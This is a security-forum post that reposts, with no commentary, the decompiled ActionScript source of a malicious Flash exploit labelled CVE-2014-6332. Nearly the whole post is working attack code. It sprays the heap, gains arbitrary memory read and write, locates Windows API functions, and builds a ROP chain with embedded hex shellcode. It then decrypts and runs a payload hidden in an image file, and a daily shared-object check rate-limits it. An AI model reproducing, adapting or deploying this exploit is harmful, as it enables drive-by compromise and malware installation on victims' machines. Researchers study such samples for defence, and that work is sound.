Jump to content
Nytro

Exploit.SWF.CVE-2014-6332

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[h=1]Exploit.SWF.CVE-2014-6332[/h]By: physicaldrive0 on Nov 21st, 2014

*** PhysicalDrive0 ***

package mx.core {

    public namespace mx_internal = "http://www.adobe.com/2006/flex/mx/internal";
}//package mx.core 
?package mx.core {

    public interface IFlexAsset {

    }
}//package mx.core 
?package mx.core {
    import flash.utils.*;

    public class ByteArrayAsset extends ByteArray implements IFlexAsset {

        mx_internal static const VERSION:String = "4.6.0.23201";

    }
}//package mx.core 
?package {
    import mx.core.*;

    public class flappyMan_keyClass extends ByteArrayAsset {

    }
}//package 
?package {
    import flash.events.*;
    import flash.utils.*;
    import flash.display.*;
    import flash.media.*;
    import __AS3__.vec.*;
    import flash.net.*;
    import flash.external.*;

    public class flappyMan extends MovieClip {

        public var keyClass:Class;
        private var btaObj:ByteArray;
        private var outObj:theoutobj;
        private var sndObj:Sound;
        public var vtObj20W:Vector.<Object>;
        public var vtObj1H:Vector.<Object>;
        public var vtObj20WLen:int = 1022;
        public var vtObj1HLen:int = 1007;
        private var workTimerExploit:Timer;
        private var bGoNextStep:Boolean = false;
        private var bExploited:Boolean = false;
        private var infectedObjIndex:int = 0;
        private var changedPropertyObjIndex:int = 0;
        private var iLoopCount:int = 0;
        private var controlledAddr:uint = 0;
        private var heapSprayObjAddr:uint = 0x1E140000;
        private var fakeEnvcoreObjAddr:uint;
        private var offset:int = 0;
        private var iCountOffset:int = 184;
        private var stackMemoryStructAddr:int = 0;
        private var flagNumber:uint = 3735928545;
        private var flagSavePosition:int = 176;
        private var ropChainLen:int = 0;
        private var uiNopValue:uint = 0;
        private var recObjAddr:uint = 0;
        private var _MaxCountPos:uint = 0;
        private var heapSprayLenByEnv20W:int = 98688;
        private var storedObjIndex:int = 0;
        public var fModuleAddrStart:int = 0;
        public var fModuleAddrEnd:int = 0;
        private var code:String = "";
        private var stopCode:String = "";
        private var jpgBytes:ByteArray;
        private var jpgLoader:URLLoader;
        private var floatString:String = "";

        public function flappyMan(){
            this.keyClass = flappyMan_keyClass;
            this.fakeEnvcoreObjAddr = (this.heapSprayObjAddr + 0x0100);
            this.stackMemoryStructAddr = (this.heapSprayObjAddr + 32);
            this.btaObj = new ByteArray();
            this.outObj = new theoutobj();
            this.sndObj = new Sound();
            this.vtObj20W = new Vector.<Object>(this.heapSprayLenByEnv20W);
            this.vtObj1H = new Vector.<Object>(256);
            var _local1:Number = 500;
            var _local2:int = (17 * 2);
            this.workTimerExploit = new Timer((_local1 / 2), _local2);
            super();
            var _local3:* = new URLRequest();
            this.jpgBytes = new ByteArray();
            this.jpgLoader = new URLLoader();
            _local3.url = "shadow.jpg";
            this.jpgLoader.dataFormat = URLLoaderDataFormat.BINARY;
            this.jpgLoader.addEventListener(Event.COMPLETE, this.func_prepare);
            this.jpgLoader.load(_local3);
        }
        private function evalCode(_arg1:uint):void{
            if (ExternalInterface.available){
                ExternalInterface.call("Beginx", "");
            };
        }
        private function checkEvnExploitable():Boolean{
            return (true);
        }
        private function checksharobject():Boolean{
            var _local2:Number;
            var _local1:SharedObject = SharedObject.getLocal("flashplayerinUSA");
            if (_local1.size == 0){
                _local1.close();
                return (false);
            };
            _local2 = (new Date().time - _local1.data.now);
            if (_local2 < ((((1 * 24) * 60) * 60) * 1000)){
                _local1.close();
                return (true);
            };
            _local1.close();
            return (false);
        }
        private function setsharobject():Boolean{
            var _local1:SharedObject = SharedObject.getLocal("flashplayerinUSA");
            if (_local1.size == 0){
                _local1.data.now = new Date().time;
                _local1.flush();
                _local1.close();
                return (true);
            };
            return (false);
        }
        public function func_prepare(_arg1:Event):void{
            var _local2:int;
            var _local3:int;
            var _local4:int;
            if (((!(this.checkEvnExploitable())) || (this.checksharobject()))){
                return;
            };
            _local2 = 0;
            while (_local2 < this.heapSprayLenByEnv20W) {
                this.vtObj20W[_local2] = new Vector.<uint>(this.vtObj20WLen);
                this.vtObj20W[_local2][(this.vtObj20WLen - 2)] = 1;
                _local2++;
            };
            _local2 = 0;
            while (_local2 < 0x0100) {
                this.vtObj1H[_local2] = new Vector.<Object>(this.vtObj1HLen);
                _local3 = 0;
                while (_local3 < this.vtObj1HLen) {
                    this.vtObj1H[_local2][_local3] = this.sndObj;
                    _local3++;
                };
                _local2++;
            };
            this.evalCode(0);
            this.workTimerExploit.start();
            this.workTimerExploit.addEventListener(TimerEvent.TIMER, this.func_step2);
        }
        public function func_step2(_arg1:Event):void{
            if (this.bExploited == true){
                this.workTimerExploit.stop();
                return;
            };
            var _local2:int;
            while (_local2 < this.heapSprayLenByEnv20W) {
                try {
                    if ((this.vtObj20W[_local2] as Vector.<uint>).length > this.vtObj20WLen){
                        this.bExploited = true;
                        break;
                    };
                } catch(e:Error) {
                };
                _local2++;
            };
            if (!this.bExploited){
                return;
            };
            this.workTimerExploit.stop();
            this.changedPropertyObjIndex = _local2;
            this.storedObjIndex = this.changedPropertyObjIndex;
            _local2 = 0;
            this.uiNopValue = this.vtObj20W[this.changedPropertyObjIndex][((0x1000 / 4) - 2)];
            if (this.uiNopValue != this.vtObj20WLen){
                this._MaxCountPos = (((this.vtObj20W[this.storedObjIndex].length - (0x1000 / 4)) - 2) / (0x1000 / 4));
                _local2 = 0;
                while (_local2 < this._MaxCountPos) {
                    this.uiNopValue = this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 2) + ((0x1000 / 4) * _local2))];
                    if (this.uiNopValue == this.vtObj20WLen){
                        break;
                    };
                    _local2++;
                };
                if (_local2 == this._MaxCountPos){
                    this.bExploited = true;
                    return;
                };
            };
            this.recObjAddr = this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 1) + ((0x1000 / 4) * _local2))];
            this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 2) + ((0x1000 / 4) * _local2))] = 1073741823;
            if (this.checkProperty() == false){
                return;
            };
            this.controlledAddr = ((this.heapSprayObjAddr + (0x1000 * (_local2 + 1))) + 8);
            var _local3:uint;
            var _local4:uint = (this.controlledAddr + ((this.heapSprayLenByEnv20W - this.changedPropertyObjIndex) * 0x1000));
            _local2 = ((this.controlledAddr & 0xFFFFF000) + 0x1000);
            while (_local2 < _local4) {
                if (((((((((((((!((this.readUnsignedInt((_local2 + (4 * 4))) == 0))) && (!((this.readUnsignedInt((_local2 + (6 * 4))) == 0))))) && ((this.readUnsignedInt((_local2 + (7 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (8 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (12 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (13 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (15 * 4))) == 2)))){
                    _local3 = _local2;
                    break;
                };
                _local2 = (_local2 + 0x1000);
            };
            if (!_local3){
                return (this.safe_exit());
            };
            var _local5:int = _local3;
            while (1) {
                if (_local5 < 65536){
                    return (this.safe_exit());
                };
                if (this.readUnsignedInt((_local5 + 16)) < 5){
                    break;
                };
                _local5 = this.readUnsignedInt((16 + _local5));
            };
            var _local6:int;
            var _local7:int;
            while (_local6 < 100) {
                if ((((((this.readUnsignedInt(((_local5 + 80) + (_local6 * 40))) > 0x10000000)) && ((this.readUnsignedInt(((_local5 + 76) + (_local6 * 40))) == 0)))) && ((this.readUnsignedInt(((_local5 + 84) + (_local6 * 40))) == 0)))){
                    _local7 = this.readUnsignedInt(((_local5 + 80) + (_local6 * 40)));
                    if ((((((((this.readUnsignedInt((_local7 + 4)) == 1007)) && ((this.readUnsignedInt((_local7 + 16)) == this.readUnsignedInt((_local7 + 64)))))) && ((this.readUnsignedInt((_local7 + 28)) == this.readUnsignedInt((_local7 + 44)))))) && (this.readUnsignedInt((_local7 + 28))))){
                        break;
                    };
                };
                _local6++;
            };
            if (_local6 == 100){
                return (this.safe_exit());
            };
            _local7 = this.readUnsignedInt((_local7 + 28));
            _local7 = (_local7 & 0xFFFFFFFC);
            var _local8:uint = this.readUnsignedInt(_local7);
            _local8 = (_local8 & 0xFFFF0000);
            while (1) {
                if ((this.readUnsignedInt(_local8) % 65536) == 23117){
                    break;
                };
                _local8 = (_local8 - 65536);
            };
            var _local9:uint = _local8;
            _local8 = this.readUnsignedInt((_local9 + 60));
            _local8 = this.readUnsignedInt(((_local9 + _local8) + 128));
            _local8 = (_local9 + _local8);
            var _local10:int = _local8;
            var _local11:int;
            var _local12:int;
            _local6 = 0;
            while (_local6 < 20) {
                _local8 = (_local9 + this.readUnsignedInt(((_local10 + (_local6 * 20)) + 12)));
                if ((this.readUnsignedInt(_local8) ^ 0x20202020) == 1852990827){
                    _local12 = (_local9 + this.readUnsignedInt((_local10 + (_local6 * 20))));
                    _local11 = (_local9 + this.readUnsignedInt(((_local10 + (_local6 * 20)) + 16)));
                    break;
                };
                _local6++;
            };
            if (_local6 == 20){
                return (this.safe_exit());
            };
            var _local13:uint;
            var _local14:uint;
            var _local15:uint;
            var _local16:uint;
            var _local17:int;
            _local6 = 0;
            while ((((_local6 < 1367)) && ((_local17 < 2)))) {
                _local8 = (_local9 + this.readUnsignedInt((_local12 + (_local6 * 4))));
                if ((((_local8 == _local9)) || ((_local8 > (_local9 + 0xFFFFFF))))){
                    break;
                };
                if (((!(_local13)) && ((((((this.readUnsignedInt((_local8 + 2)) == 1953655126)) && ((this.readUnsignedInt((_local8 + 6)) == 1097621877)))) && ((this.readUnsignedInt((_local8 + 10)) == 1668246636)))))){
                    _local14 = (_local11 + (_local6 * 4));
                    _local13 = this.readUnsignedInt(_local14);
                    _local17++;
                } else {
                    if (((!(_local15)) && ((((((this.readUnsignedInt((_local8 + 2)) == 1349805383)) && ((this.readUnsignedInt((_local8 + 6)) == 1097035634)))) && ((this.readUnsignedInt((_local8 + 10)) == 1701995620)))))){
                        _local16 = (_local11 + (_local6 * 4));
                        _local15 = this.readUnsignedInt(_local16);
                        _local17++;
                    };
                };
                _local6++;
            };
            if (_local6 == 1367){
                return (this.safe_exit());
            };
            this.fModuleAddrStart = this.readUnsignedInt((_local9 + 60));
            this.fModuleAddrEnd = this.readUnsignedInt(((_local9 + this.fModuleAddrStart) + 264));
            this.fModuleAddrStart = this.readUnsignedInt(((_local9 + this.fModuleAddrStart) + 260));
            this.fModuleAddrStart = (_local9 + this.fModuleAddrStart);
            this.fModuleAddrEnd = (_local9 + this.fModuleAddrEnd);
            _local6 = this.fModuleAddrStart;
            this.writeUnsignedInt((this.stackMemoryStructAddr - 8), this.fModuleAddrStart);
            this.writeUnsignedInt((this.stackMemoryStructAddr - 4), this.fModuleAddrEnd);
            var _local18:int;
            _local6 = this.fModuleAddrStart;
            while (_local6 < this.fModuleAddrEnd) {
                if ((((((this.readUnsignedInt(_local6) == _local14)) && (((this.readUnsignedInt((_local6 - 2)) & 0xFFFF) == 5631)))) && (((this.readUnsignedInt((_local6 + 4)) & 0xFF) == 195)))){
                    _local18 = (_local6 - 2);
                    break;
                };
                _local6++;
            };
            var _local19:uint;
            var _local20:uint;
            var _local21:uint;
            var _local22:uint;
            var _local23:uint;
            var _local24:uint;
            var _local25:uint;
            var _local26:uint;
            _local6 = (this.fModuleAddrStart + 0x1000);
            _local17 = 0;
            while ((((_local6 < (this.fModuleAddrEnd - 4))) && ((_local17 < 4)))) {
                _local21 = this.readUnsignedInt(_local6);
                if (((!(_local26)) && (((_local21 & 0xFFFF) == 50068)))){
                    _local26 = _local6;
                    _local17++;
                };
                if (((!(_local25)) && (((_local21 & 0xFFFF) == 50070)))){
                    _local25 = _local6;
                    _local17++;
                };
                if (((!(_local23)) && (((_local21 & 0xFFFF) == 50008)))){
                    _local23 = _local6;
                    _local17++;
                };
                if (((!(_local24)) && (((_local21 & 0xFFFF) == 8447)))){
                    _local24 = _local6;
                    _local17++;
                };
                _local6++;
            };
            if ((((((((((((((_local13 == 0)) || ((_local25 == 0)))) || ((_local24 == 0)))) || ((_local23 == 0)))) || ((_local18 == 0)))) || ((_local15 == 0)))) || ((_local26 == 0)))){
                return (this.safe_exit());
            };
            var _local27:int = (_local25 + 1);
            var _local28:int = (this.heapSprayObjAddr + 65792);
            var _local29 = (_local28 & 0xFFFFF000);
            var _local30:ByteArray = new ByteArray();
            _local30.endian = Endian.LITTLE_ENDIAN;
            _local6 = 0;
            while (_local6 < 0x0100) {
                var _temp1 = _local6;
                _local6 = (_local6 + 1);
                _local30.writeUnsignedInt(this.readUnsignedInt((_local29 + (4 * _temp1))));
            };
            var _local31:ByteArray = new ByteArray();
            _local31.endian = Endian.LITTLE_ENDIAN;
            _local6 = 0;
            while (_local6 < 262144) {
                var _temp2 = _local6;
                _local6 = (_local6 + 1);
                _local31.writeUnsignedInt(this.readUnsignedInt((_local28 + (4 * _temp2))));
            };
            var _local32 = 96;
            var _local33 = 32;
            var _local34:int;
            var _local35:uint = ((_local28 + _local32) + _local33);
            var _temp3 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local29 + (4 * _temp3)), _local35);
            _local34 = 0;
            var _temp4 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp4)), _local27);
            var _temp5 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp5)), _local25);
            var _temp6 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp6)), _local23);
            var _temp7 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp7)), _local28);
            var _temp8 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp8)), _local18);
            var _temp9 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp9)), _local29);
            var _temp10 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp10)), 65536);
            var _temp11 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp11)), 0x1000);
            var _temp12 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp12)), 64);
            var _temp13 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp13)), (_local18 + 6));
            var _temp14 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp14)), (_local18 + 6));
            var _temp15 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp15)), (_local18 + 6));
            var _temp16 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp16)), _local24);
            var _temp17 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp17)), _local24);
            this.ropChainLen = (_local34 * 4);
            while (_local34 < (_local32 / 4)) {
                var _temp18 = _local34;
                _local34 = (_local34 + 1);
                this.writeUnsignedInt((_local28 + (4 * _temp18)), (_local28 + _local32));
            };
            while (_local34 < ((_local32 + _local33) / 4)) {
                var _temp19 = _local34;
                _local34 = (_local34 + 1);
                this.writeUnsignedInt((_local28 + (4 * _temp19)), _local26);
            };
            this.ropChainLen = _local34;
            var _temp20 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp20)), 2425415307);
            var _temp21 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp21)), 0x90909090);
            var _temp22 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp22)), 3096481936);
            var _temp23 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp23)), (this.heapSprayObjAddr + 8));
            var _temp24 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp24)), 3146813584);
            var _temp25 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp25)), _local15);
            var _temp26 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp26)), 2425362569);
            var _temp27 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp27)), 3096481936);
            var _temp28 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp28)), (_local35 + (((_local34 - this.ropChainLen) + 1) * 4)));
            var _temp29 = _local34;
            _local34 = (_local34 + 1);
            this.writeUnsignedInt((_local28 + (4 * _temp29)), 2428752127);
            var _local36 = "81ec8b550003ccec57565300fc6085c70000ffff85c70000fffffc3800000000fd1885c70000ffff85c70000fffffc7000000000fc4485c70001ffff85c70000fffffce400000000fcd885c70000ffff85c70000fffffc3c00000000fd0c85c70000ffff45c70000000000fcf485c70000fffffcc7000000fffc4c85000000ff0085c70000fffffd33000000858966c0fffffc648966c933fffd108ddc85c7ff00fffffcc7000000fffd0485000000fff885c70000fffffcc7000000fffc5085000000ff0885c70000fffffdc7000000fffc5885000000ff5c85c70000fffffcc7000000fffc4885000000ff6885c70000fffffcc7000000fffd2485000000ff4085c70000fffffcc7000000fffc5485000000fffc85c70000fffffcc7000000fffc7485000000ff7885c70000fffffcc7000000fffc7c85000000ffe885c70045fffffcc754454dfffcec854c442efff085c74c00fffffcc7000000fffd1c85000000ff2085c70000fffffdc7000000fffce085000000ff6c85c70000fffffcc7000000fffc8085917432ff8485c70c85fffffcc7bbafdffffc8885de5967ff8c85c71e05fffffcc76144aafffc90853d8815ff9485c76c58fffffcc797410ffffc9885e2f2b2ff9c85c7f4a0fffffcc7cb9765fffca08564a41effa485c7efbbfffffcc72729f8fffca885ae9074ffac85c78093fffffcc794e432fffcb0851f8dc4ffb485c77457fffffcc7ff0d66fffcb885a22f51ffbc85c70139fffffcc7837de2fffcc08507d145ffc485c74863fffffcc74fd189fffcc88517053dffcc85c78ed7fffffcc7818f6efffcd08544d772ffd485c78072fffffce88644d700000000f0002558002dffff89000100fffc488589008bfffffc588530a164ff8b00000085890c40fffffd148b1c408bdc8b0840fc488d8bec83ffff2404c7206553744e042444c76e6f4374082444c7747865740c2444c765726854102444c70000646151ff50548de38b08fffc808d544189ff28bd8d5733fffffdccb966c9f3c0330285c75faafffffd2800010010fd28958d6a52ffffd495fffe89fffffcfffd088508bd83ff00fffffd41e905748b000003fffc9085508589ff8dfffffcfffc8085f88b60ffa164c933000000308b0c408b688b1c4020588b084b38008bb1f375180c4b383332b1ec75750e4b38382eb1e5de75104bf78bed8be859126a0000001fee8bf9e26e686c6a546c6474c48316ff6ae88b0804e85903e20000005145ebf93c758b56782e748b8b56f503f50320764149c93333c503ad10be0fdb0874d63a0307cbc1f1eb40dae7751f3b245e8b5e8b66dd035e8b4b0c8bdd031cc5038b04c3595eab508d8b613bfffffcfffc908de90575ff00000278000000e885895800fffffc5c086a0c6afca895ffff50fffffffcc8957c8589ff83fffffcfffc7cbd057500ff000247e96a586a00a895ff0850fffffcfcc895ff958bfffffffffc7c8b084289fffc7c85087883ffe90575000000021c8d8d586afffffc807c958b518bfffffcff500842fffccc950cc483fffc588d8b3981ffffdeadbeef958b7f75fffffc5841047a81754141417c858b708bfffffcfffc588d08518bff8b045089fffc58850cc083fffc788589046affff001000687c8d8b008bfffffc6a5204518895ff008bfffffcfffc7c8d8b0189fffffc7c95003a83ff858b2374fffffc7c5104488bfc78958b8b52fffffffc7c8551088bfffccc95ffc483ffff7c958b0c83fffffc0575003a000163e968046a000000100000010468ff006a00fffc8895208589ff83fffffdfffd20bd057500ff00013be920858b0050fffffd00010468bc95ff0089fffffcfffc6c856cbd83ff00fffffc15e905758b000001fffd208d6c8d03ffc7fffffc6e69770120958b6403fffffdfffc6c950442c7ff2e706d75fd20858b8503fffffffffc6c650840c76a00657800806800026a0000036a006a8d8b026afffffd20ac95ff5189fffffcfffce085e0bd83fffffffffcade905756a0000006c958d0052fffffcfc7c858b488bffff958b5104fffffc7c8b50028bfffce08d95ff51fffffffcb0fce0958bff52fffffffcb495e8858dff50fffffcfc9895ff8589fffffffffd1cfd1cbd837400ffff8b056a11fffd208d95ff51fffffffcb8958b4aebfffffcf8c095ff5260fffffc140000b8eb20891edb33592b89338b64c033044efd209d8b5350ffff808d8d508bfffffce1ff3849140000b88b008b1e07eb61e0ffffd0e890edebffc35de58b424242427042424277a0908055000000ec81ec8b000002d85608558bf445c75754454d452ef845c7c74c4c440000fc45d28500008d573f74fffd28bd66c933ff3302ccb95faaf3c08d08728bfffd288585c750fffffffd28000100106a544e8b85d1fffe8b0e75c0558d1846d0ff52f40175c0855de58bccc340c033cccccccccccccccc0000cccc";
            var _local37:uint = this.writeString((_local28 + (4 * _local34)), _local36);
            this.writeUnsignedInt(this.heapSprayObjAddr, _local37);
            var _local38:ByteArray = (new this.keyClass() as ByteArray);
            var _local39:ByteArray = new ByteArray();
            _local38.readBytes(_local39, 0, 0x0100);
            _local38.endian = Endian.LITTLE_ENDIAN;
            _local38.position = 0x0100;
            this.jpgBytes.endian = Endian.LITTLE_ENDIAN;
            this.jpgBytes.position = 0;
            ByteArray(this.jpgLoader.data).position = _local38.readInt();
            ByteArray(this.jpgLoader.data).readBytes(this.jpgBytes, 0, 0);
            this.jpgBytes = this.encryption(this.jpgBytes, _local39);
            this.jpgBytes.endian = Endian.LITTLE_ENDIAN;
            this.jpgBytes.position = 0;
            var _local40:* = this.jpgBytes.length;
            var _local41:int;
            var _local42:uint;
            while (((_local41 + 1) * 4) < _local40) {
                _local42 = this.jpgBytes.readInt();
                try {
                    this.writeUnsignedInt((_local37 + (_local41 * 4)), _local42);
                } catch(e:Error) {
                };
                _local41++;
            };
            var _local43:uint = this.readUnsignedInt(_local7);
            this.writeUnsignedInt(_local7, _local28);
            this.sndObj.toString();
            this.writeUnsignedInt(_local7, _local43);
            _local31.position = 0;
            _local6 = 0;
            while (_local6 < (_local31.length / 4)) {
                var _temp30 = _local6;
                _local6 = (_local6 + 1);
                this.writeUnsignedInt((_local28 + (4 * _temp30)), _local31.readUnsignedInt());
            };
            _local30.position = 0;
            _local6 = 0;
            while (_local6 < (_local30.length / 4)) {
                var _temp31 = _local6;
                _local6 = (_local6 + 1);
                this.writeUnsignedInt((_local29 + (4 * _temp31)), _local30.readUnsignedInt());
            };
            this.setsharobject();
            return (this.safe_exit());
        }
        public function safe_exit():void{
            this.writeUnsignedInt(this.heapSprayObjAddr, this.vtObj20WLen);
            this.writeUnsignedInt((this.heapSprayObjAddr + 4), this.recObjAddr);
            this.writeUnsignedInt((this.controlledAddr - 8), this.vtObj20WLen);
        }
        public function logMsg(_arg1:String):void{
            if (ExternalInterface.available){
            };
        }
        public function get_address(_arg1:String):uint{
            var _local2:uint;
            if (ExternalInterface.available){
                _local2 = ExternalInterface.call(_arg1, "");
            };
            return (_local2);
        }
        public function exception_exit():void{
            if ((this.vtObj20W[this.changedPropertyObjIndex] as Vector.<uint>).length >= 1073741823){
                this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - 2)] = this.vtObj20WLen;
            };
        }
        private function read4bytes(_arg1:uint):uint{
            var _local2:uint;
            if (_arg1 > this.controlledAddr){
                _local2 = this.vtObj20W[this.changedPropertyObjIndex][((_arg1 - this.controlledAddr) / 4)];
            } else {
                _local2 = this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - ((this.controlledAddr - _arg1) / 4))];
            };
            return (_local2);
        }
        private function readUnsignedInt(_arg1:uint):uint{
            var _local2:uint;
            var _local3:uint;
            var _local4:uint;
            if ((_arg1 % 4) == 0){
                _local4 = this.read4bytes(_arg1);
            } else {
                if ((_arg1 % 4) == 1){
                    _local3 = (((this.read4bytes((_arg1 - 1)) & 0xFFFFFF00) / 0x0100) & 0xFFFFFF);
                    _local2 = (((this.read4bytes((_arg1 + 3)) & 0xFF) * 16777216) & 0xFF000000);
                    _local4 = (_local2 + _local3);
                } else {
                    if ((_arg1 % 4) == 2){
                        _local3 = (((this.read4bytes((_arg1 - 2)) & 0xFFFF0000) / 65536) & 0xFFFF);
                        _local2 = (((this.read4bytes((_arg1 + 2)) & 0xFFFF) * 65536) & 0xFFFF0000);
                        _local4 = (_local2 + _local3);
                    } else {
                        _local3 = (((this.read4bytes((_arg1 - 3)) & 0xFF000000) / 16777216) & 0xFF);
                        _local2 = (((this.read4bytes((_arg1 + 1)) & 0xFFFFFF) * 0x0100) & 0xFFFFFF00);
                        _local4 = (_local2 + _local3);
                    };
                };
            };
            return (_local4);
        }
        private function writeUnsignedInt(_arg1:uint, _arg2:uint):void{
            if (_arg1 > this.controlledAddr){
                this.vtObj20W[this.changedPropertyObjIndex][((_arg1 - this.controlledAddr) / 4)] = _arg2;
            } else {
                this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - ((this.controlledAddr - _arg1) / 4))] = _arg2;
            };
        }
        public function encryption(_arg1:ByteArray, _arg2:ByteArray):ByteArray{
            var _local3:ByteArray = new ByteArray();
            var _local4:uint = _arg1.length;
            _local3 = this.rc4_crypt(_arg2, _arg1, _local4);
            return (_local3);
        }
        public function rc4_crypt(_arg1:ByteArray, _arg2:ByteArray, _arg3:uint):ByteArray{
            var _local4:int;
            var _local5:int;
            var _local6:int;
            var _local7:uint;
            var _local8:uint;
            var _local9:ByteArray = new ByteArray();
            while (_local7 < _arg3) {
                _local4 = ((_local4 + 1) % 0x0100);
                _local5 = ((_local5 + _arg1[_local4]) % 0x0100);
                _local8 = _arg1[_local4];
                _arg1[_local4] = _arg1[_local5];
                _arg1[_local5] = _local8;
                _local6 = ((_arg1[_local4] + _arg1[_local5]) % 0x0100);
                _local9[_local7] = (_arg2[_local7] ^ _arg1[_local6]);
                _local7++;
            };
            return (_local9);
        }
        private function HexString2ByteArray(_arg1:String):ByteArray{
            var _local2:String;
            var _local3:uint = _arg1.length;
            var _local4:uint;
            var _local5:ByteArray = new ByteArray();
            _local5.endian = Endian.LITTLE_ENDIAN;
            while (_local4 < _local3) {
                _local2 = (_arg1.charAt(_local4) + _arg1.charAt((_local4 + 1)));
                _local5.writeByte(parseInt(_local2, 16));
                _local4 = (_local4 + 2);
            };
            return (_local5);
        }
        private function writeString(_arg1:int, _arg2:String):int{
            var _local3:int;
            var _local4:int;
            var _local5:int;
            var _local6:ByteArray = this.HexString2ByteArray(_arg2);
            while (_local3 < (_arg2.length / 2)) {
                _local5 = ((((_local6[_local3] * 16777216) + (_local6[(_local3 + 1)] * 65536)) + (_local6[(_local3 + 2)] * 0x0100)) + _local6[(_local3 + 3)]);
                _local3 = (_local3 + 4);
                this.writeUnsignedInt((_arg1 + (_local4 * 4)), _local5);
                _local4++;
            };
            return ((_arg1 + (_local4 * 4)));
        }
        private function checkProperty():Boolean{
            var _local1:int;
            while (_local1 < this.heapSprayLenByEnv20W) {
                if (this.vtObj20W[_local1].length == 1073741823){
                    break;
                };
                _local1++;
            };
            if (_local1 == this.heapSprayLenByEnv20W){
                return (false);
            };
            this.changedPropertyObjIndex = _local1;
            return (true);
        }

    }
}//package 

class theoutobj {

    public function theoutobj(){
    }
    public function therundata(_arg1:uint, _arg2:uint, _arg3:uint):uint{
        var _local4:uint;
        return (_local4);
    }

}

Sursa: Exploit.SWF.CVE-2014-6332 - Pastebin.com

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...